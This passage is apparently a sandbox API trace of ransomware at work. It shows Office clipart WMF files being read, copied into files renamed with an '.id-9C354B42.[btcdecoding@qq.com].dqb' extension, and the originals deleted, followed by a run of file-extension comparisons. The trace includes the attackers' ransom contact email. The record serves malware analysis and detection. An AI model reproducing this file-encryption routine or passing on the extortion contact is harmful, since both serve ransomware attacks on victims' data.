(lpString1=".bz2", lpString2=".WMF") returned -1 [0053.565] lstrlenW (lpString=".7z") returned 3 [0053.565] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.565] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF") returned 63 [0053.565] lstrlenW (lpString=".dbf") returned 4 [0053.565] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.565] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF") returned 63 [0053.565] lstrlenW (lpString=".1cd") returned 4 [0053.565] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.565] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF") returned 63 [0053.565] lstrlenW (lpString=".jpg") returned 4 [0053.565] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.571] GetFileSizeEx (in: hFile=0x184, lpFileSize=0x2c7ff1c | out: lpFileSize=0x2c7ff1c*=47996) returned 1 [0053.571] CloseHandle (hObject=0x184) returned 1 [0053.571] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08808_.wmf")) returned 0x20 [0053.571] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08808_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0053.571] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08808_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0053.572] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.572] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.572] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08808_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0053.572] GetLastError () returned 0x0 [0053.572] ReadFile (in: hFile=0x184, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0xbb7c, lpOverlapped=0x0) returned 1 [0053.574] WriteFile (in: hFile=0x17c, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xbb80, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xbb80, lpOverlapped=0x0) returned 1 [0053.575] ReadFile (in: hFile=0x184, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.575] WriteFile (in: hFile=0x17c, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.575] SetEndOfFile (hFile=0x17c) returned 1 [0053.576] CloseHandle (hObject=0x17c) returned 1 [0053.576] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.576] SetEndOfFile (hFile=0x184) returned 1 [0053.577] CloseHandle (hObject=0x184) returned 1 [0053.577] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0053.577] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08808_.wmf")) returned 1 [0053.577] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF") returned 63 [0053.577] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF") returned 63 [0053.577] lstrlenW (lpString=".doc") returned 4 [0053.577] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.577] lstrlenW (lpString=".docx") returned 5 [0053.577] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.577] lstrlenW (lpString=".pdf") returned 4 [0053.577] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.577] lstrlenW (lpString=".xls") returned 4 [0053.577] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.577] lstrlenW (lpString=".xlsx") returned 5 [0053.577] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.577] lstrlenW (lpString=".ppt") returned 4 [0053.577] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.577] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF") returned 63 [0053.577] lstrlenW (lpString=".zip") returned 4 [0053.577] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.578] lstrlenW (lpString=".rar") returned 4 [0053.578] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.578] lstrlenW (lpString=".bz2") returned 4 [0053.578] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.578] lstrlenW (lpString=".7z") returned 3 [0053.578] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.578] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF") returned 63 [0053.578] lstrlenW (lpString=".dbf") returned 4 [0053.578] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.578] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF") returned 63 [0053.578] lstrlenW (lpString=".1cd") returned 4 [0053.578] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.578] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF") returned 63 [0053.578] lstrlenW (lpString=".jpg") returned 4 [0053.578] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.578] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.578] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.578] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08868_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0053.579] GetLastError () returned 0x0 [0053.579] ReadFile (in: hFile=0x184, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x9d0e, lpOverlapped=0x0) returned 1 [0053.580] WriteFile (in: hFile=0x17c, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x9d10, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x9d10, lpOverlapped=0x0) returned 1 [0053.582] ReadFile (in: hFile=0x184, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.582] WriteFile (in: hFile=0x17c, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.582] SetEndOfFile (hFile=0x17c) returned 1 [0053.582] CloseHandle (hObject=0x17c) returned 1 [0053.582] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.582] SetEndOfFile (hFile=0x184) returned 1 [0053.583] CloseHandle (hObject=0x184) returned 1 [0053.583] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0053.583] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08868_.wmf")) returned 1 [0053.584] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 63 [0053.584] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 63 [0053.584] lstrlenW (lpString=".doc") returned 4 [0053.584] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.584] lstrlenW (lpString=".docx") returned 5 [0053.584] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.584] lstrlenW (lpString=".pdf") returned 4 [0053.584] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.584] lstrlenW (lpString=".xls") returned 4 [0053.584] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.584] lstrlenW (lpString=".xlsx") returned 5 [0053.584] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.584] lstrlenW (lpString=".ppt") returned 4 [0053.584] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.584] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 63 [0053.584] lstrlenW (lpString=".zip") returned 4 [0053.584] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.584] lstrlenW (lpString=".rar") returned 4 [0053.584] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.584] lstrlenW (lpString=".bz2") returned 4 [0053.584] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.584] lstrlenW (lpString=".7z") returned 3 [0053.584] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.584] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 63 [0053.584] lstrlenW (lpString=".dbf") returned 4 [0053.584] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.584] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 63 [0053.584] lstrlenW (lpString=".1cd") returned 4 [0053.584] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.584] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 63 [0053.584] lstrlenW (lpString=".jpg") returned 4 [0053.584] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.585] GetFileSizeEx (in: hFile=0x184, lpFileSize=0x2c7ff1c | out: lpFileSize=0x2c7ff1c*=47786) returned 1 [0053.585] CloseHandle (hObject=0x184) returned 1 [0053.585] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09031_.wmf")) returned 0x20 [0053.585] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09031_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0053.585] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09031_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0053.585] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.585] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.585] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09031_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0053.585] GetLastError () returned 0x0 [0053.585] ReadFile (in: hFile=0x184, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0xbaaa, lpOverlapped=0x0) returned 1 [0053.701] WriteFile (in: hFile=0x17c, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xbab0, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xbab0, lpOverlapped=0x0) returned 1 [0053.702] ReadFile (in: hFile=0x184, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.702] WriteFile (in: hFile=0x17c, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.703] SetEndOfFile (hFile=0x17c) returned 1 [0053.703] CloseHandle (hObject=0x17c) returned 1 [0053.703] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.703] SetEndOfFile (hFile=0x184) returned 1 [0053.704] CloseHandle (hObject=0x184) returned 1 [0053.704] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0053.704] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09031_.wmf")) returned 1 [0053.820] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF") returned 63 [0053.820] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF") returned 63 [0053.820] lstrlenW (lpString=".doc") returned 4 [0053.820] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.820] lstrlenW (lpString=".docx") returned 5 [0053.820] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.820] lstrlenW (lpString=".pdf") returned 4 [0053.820] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.820] lstrlenW (lpString=".xls") returned 4 [0053.820] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.820] lstrlenW (lpString=".xlsx") returned 5 [0053.820] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.821] lstrlenW (lpString=".ppt") returned 4 [0053.821] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.821] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF") returned 63 [0053.821] lstrlenW (lpString=".zip") returned 4 [0053.821] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.821] lstrlenW (lpString=".rar") returned 4 [0053.821] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.821] lstrlenW (lpString=".bz2") returned 4 [0053.821] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.821] lstrlenW (lpString=".7z") returned 3 [0053.821] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.821] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF") returned 63 [0053.821] lstrlenW (lpString=".dbf") returned 4 [0053.821] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.821] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF") returned 63 [0053.821] lstrlenW (lpString=".1cd") returned 4 [0053.821] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.821] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF") returned 63 [0053.821] lstrlenW (lpString=".jpg") returned 4 [0053.821] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.004] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.004] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.004] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00012_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00012_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0055.004] GetLastError () returned 0x0 [0055.005] ReadFile (in: hFile=0x240, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x265a, lpOverlapped=0x0) returned 1 [0055.006] WriteFile (in: hFile=0x214, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x2660, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x2660, lpOverlapped=0x0) returned 1 [0055.007] ReadFile (in: hFile=0x240, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0055.007] WriteFile (in: hFile=0x214, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.007] SetEndOfFile (hFile=0x214) returned 1 [0055.007] CloseHandle (hObject=0x214) returned 1 [0055.008] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.008] SetEndOfFile (hFile=0x240) returned 1 [0055.008] CloseHandle (hObject=0x240) returned 1 [0055.009] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00012_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0055.009] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00012_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00012_.wmf")) returned 1 [0055.009] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00012_.WMF") returned 63 [0055.009] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00012_.WMF") returned 63 [0055.009] lstrlenW (lpString=".doc") returned 4 [0055.009] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.009] lstrlenW (lpString=".docx") returned 5 [0055.009] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.009] lstrlenW (lpString=".pdf") returned 4 [0055.009] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.009] lstrlenW (lpString=".xls") returned 4 [0055.009] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.009] lstrlenW (lpString=".xlsx") returned 5 [0055.009] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.009] lstrlenW (lpString=".ppt") returned 4 [0055.009] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.009] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00012_.WMF") returned 63 [0055.009] lstrlenW (lpString=".zip") returned 4 [0055.010] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.010] lstrlenW (lpString=".rar") returned 4 [0055.010] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.010] lstrlenW (lpString=".bz2") returned 4 [0055.010] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.010] lstrlenW (lpString=".7z") returned 3 [0055.010] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.010] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00012_.WMF") returned 63 [0055.010] lstrlenW (lpString=".dbf") returned 4 [0055.010] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.010] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00012_.WMF") returned 63 [0055.010] lstrlenW (lpString=".1cd") returned 4 [0055.010] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.010] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00012_.WMF") returned 63 [0055.010] lstrlenW (lpString=".jpg") returned 4 [0055.010] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.010] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.010] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.010] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00098_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0055.011] GetLastError () returned 0x0 [0055.011] ReadFile (in: hFile=0x240, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x3f4, lpOverlapped=0x0) returned 1 [0055.012] WriteFile (in: hFile=0x214, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x400, lpOverlapped=0x0) returned 1 [0055.013] ReadFile (in: hFile=0x240, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0055.013] WriteFile (in: hFile=0x214, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.013] SetEndOfFile (hFile=0x214) returned 1 [0055.013] CloseHandle (hObject=0x214) returned 1 [0055.013] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.013] SetEndOfFile (hFile=0x240) returned 1 [0055.014] CloseHandle (hObject=0x240) returned 1 [0055.014] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0055.014] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00098_.wmf")) returned 1 [0055.014] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF") returned 63 [0055.015] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF") returned 63 [0055.015] lstrlenW (lpString=".doc") returned 4 [0055.015] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.015] lstrlenW (lpString=".docx") returned 5 [0055.015] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.015] lstrlenW (lpString=".pdf") returned 4 [0055.015] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.015] lstrlenW (lpString=".xls") returned 4 [0055.015] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.015] lstrlenW (lpString=".xlsx") returned 5 [0055.015] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.015] lstrlenW (lpString=".ppt") returned 4 [0055.015] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.015] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF") returned 63 [0055.015] lstrlenW (lpString=".zip") returned 4 [0055.015] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.015] lstrlenW (lpString=".rar") returned 4 [0055.015] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.015] lstrlenW (lpString=".bz2") returned 4 [0055.015] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.015] lstrlenW (lpString=".7z") returned 3 [0055.015] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.015] 